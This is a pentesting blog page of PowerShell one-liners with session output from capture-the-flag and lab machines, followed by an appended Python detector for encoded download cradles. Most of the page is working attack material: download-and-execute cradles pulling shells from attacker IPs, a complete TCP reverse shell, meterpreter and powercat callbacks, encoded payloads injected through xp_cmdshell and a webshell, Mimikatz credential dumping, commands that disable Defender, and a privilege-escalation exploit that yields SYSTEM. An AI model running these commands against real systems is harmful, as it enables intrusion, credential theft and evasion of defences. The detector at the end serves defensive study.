puckiestyle – pentesting


whoami : Network / System Engineer , Security specialist from Meppel (NL)

PowerShell one-liners

PowerShell (any version):

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")

C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat','launcher.bat'); Start-Process 'launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')

C:\Users\hillie> cmdkey /list

Currently stored credentials:
Target: Domain:interactive=HTB\Administrator
Type: Domain Password
User: HTB\Administrator
c:\Python37> python -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public> certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1

PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml

CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.

PS C:\pentest> dir *.bin

Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml

PS C:\pentest> dir *.xml

Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 msbuild_nps.xml
C:\Users\Public> runas /user:HTB\administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"

C:\Users\jacco> nc -lvp 443

listening on [any] 443 ...
10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA
Windows PowerShell running as user Administrator on HTB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami

HTB\administrator
root@kali:~/htb/access# echo -n "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=

c:\Users\Public> runas /user:ACCESS\administrator /savecred "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="

powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.178.13/powercat.ps1');powercat -c 192.168.178.13 -p 1234 -e cmd

PowerShell 4.0 & 5.0:

PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"

xp_cmdshell "PowerShell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.20/puckieshell443.ps1'))"

c:\inetpub\wwwroot\internal-01\log> powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

Cannot load PSReadline module. Console is running without PSReadline.
PS C:\inetpub\wwwroot\internal-01\log> $username = 'BART\h.potter'
PS C:\inetpub\wwwroot\internal-01\log> $securePassword = ConvertTo-SecureString -AsPlainText -Force 'Password1'
PS C:\inetpub\wwwroot\internal-01\log> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\inetpub\wwwroot\internal-01\log> Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\h.potter\Documents> whoami
bart\h.potter
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitOperatingSystem
True
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitProcess
True


PS C:\users> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1')

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerup.ps1');Invoke-AllChecks"

PS C:\Users\hillie> (new-object net.webclient).downloadfile('http://10.10.14.20/powerup.ps1', 'C:\users\mssql-svc\appdata\local\temp\powerup.ps1')

PS C:\users\mssql-svc\appdata\local\temp> import-module ./powerup.ps1

[*] Running Invoke-AllChecks

PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444

PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")

d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator

C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe

wmic /NODE:"DC01" /USER:"puckiestyle\administrator" OS GET Name

wmic /node:192.168.23.214 NIC get description,macaddress

wmic /USER:"puckiestyle\puck" /PASSWORD:"p@ssw0rd" /NODE:192.168.178.200 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt"

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

rundll32.exe user32.dll,LockWorkStation

root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe

root@kali# msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j"

PS C:\WINDOWS\system32> Set-MpPreference -DisableRealtimeMonitoring $true

PS C:\WINDOWS\system32> Set-MpPreference -DisableIOAVProtection $true

Change Claire's password:

Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Log in as Claire and grant Tom membership of Backup_Admins:

Powershell Add-ADGroupMember -Identity Backup_Admins -Members tom

Want to add a brand new executable extension (also callable from a .bat)?

C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck

Want to know Applocker status from a cmd shell?

powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"

Set TrustedHosts with PowerShell (as Admin)

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"

And check (no Admin needed for that):

Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public> powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')

root@kali:~/htb/optimum# python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -

root@kali:~/htb/optimum# nc -lvp 53

Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49541.
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitProcess
True

PS C:\users> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1")

PS C:\users\public> import-module ./Invoke-MS16135.ps1

PS C:\users\public> Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')"

(MS16-135 ASCII-art banner)
[by b33f -> @FuzzySec]

[!] Success, spawning a system shell!

root@kali:~/htb# nc -lvp 53

listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public> whoami
nt authority\system

If you ever need to enable RDP (mstsc) on a Windows 10 machine and you can't get to the System control panel item, use PowerShell to enable RDP:

Execute the above cmdlets as Administrator in PowerShell, and RDP should work.

To test the connection, open Powershell on another machine, and run:

PS C:\Users\jacco> Test-NetConnection 10.10.10.97 -CommonTCPPort rdp

ComputerName : 10.10.10.97
RemoteAddress : 10.10.10.97
RemotePort : 3389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.12
TcpTestSucceeded : True

PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\PENTEST\secret.txt"))

ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\pentest> [IO.File]::WriteAllBytes("c:\pentest\new.txt", [Convert]::FromBase64String("ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr"))

PS C:\pentest> type new.txt
dit bestand is geheim
groetjes Puck
# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"

# Invoke-Inveigh and log output to file

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-Kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound

powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL

findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]

runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Download cradle (saved to a file named cradle):
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/puckiestyle/powershell/refs/heads/master/rev.ps1')

then

cat cradle | iconv -t utf-16le | base64 -w0; echo
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=

then

http://10.10.11.17/data/modules/shell.php?cmd=powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcAB1AGMAawBpAGUAcwB0AHkAbABlAC8AcABvAHcAZQByAHMAaABlAGwAbAAvAHIAZQBmAHMALwBoAGUAYQBkAHMALwBtAGEAcwB0AGUAcgAvAHIAZQB2AC4AcABzADEAJwApAAoACgA=
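The defender-side counterpart to the iconv/base64 encoding used above and earlier on this page, and to the certutil download trick: an added Python example, not part of the original post, that reverses the UTF-16LE/base64 step to recover the script behind a -EncodedCommand argument and flags the cradle patterns this page uses in process-creation command lines. The 4688-style log format, the indicator list and the sample lines are constructed assumptions.

```python
import base64
import re

# Constructed sample: the cradle this page encodes with iconv/base64 (not a captured host value)
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')"

def encode_command(script: str) -> str:
    """Same transform as `iconv -t UTF-16LE | base64 -w0`: the form -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# powershell.exe accepts abbreviated switch names, so match the usual short forms as well
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Indicators drawn from the one-liners on this page: (label, pattern); assumed list, extend as needed
INDICATORS = [
    ("download cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I)),
    ("in-memory execution", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("reverse shell", re.compile(r"tcpclient|powercat", re.I)),
    ("certutil download", re.compile(r"certutil(?:\.exe)?\s.*-(?:urlcache|verifyctl)", re.I)),
]

def decode_encoded_command(cmdline: str):
    """Return the script hidden behind a -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # bad padding/length or an odd byte count: not a real encoded command

def classify(cmdline: str):
    """Decode the command line if it is encoded, then list the indicator labels it matches."""
    script = decode_encoded_command(cmdline) or cmdline
    return [label for label, pat in INDICATORS if pat.search(script)]

def scan(lines):
    """Map the index of each suspicious line to its labels; lines with no indicator are omitted."""
    return {i: labels for i, line in enumerate(lines) if (labels := classify(line))}

# Constructed 4688-style process-creation lines (assumed format); the first carries the encoded cradle
SAMPLE_LOGS = [
    "4688 New Process: powershell.exe Command Line: powershell -EncodedCommand " + encode_command(CRADLE),
    "4688 New Process: certutil.exe Command Line: certutil -urlcache -split -f http://10.10.14.20/x.ps1",
    "4688 New Process: powershell.exe Command Line: powershell -nop -c Get-Service",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOGS))
```

Feeding real 4688 or Sysmon Event 1 command lines through scan() surfaces the encoded cradle as plain text, which is what the -enc form in the webshell request above is meant to hide from casual log review.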

 
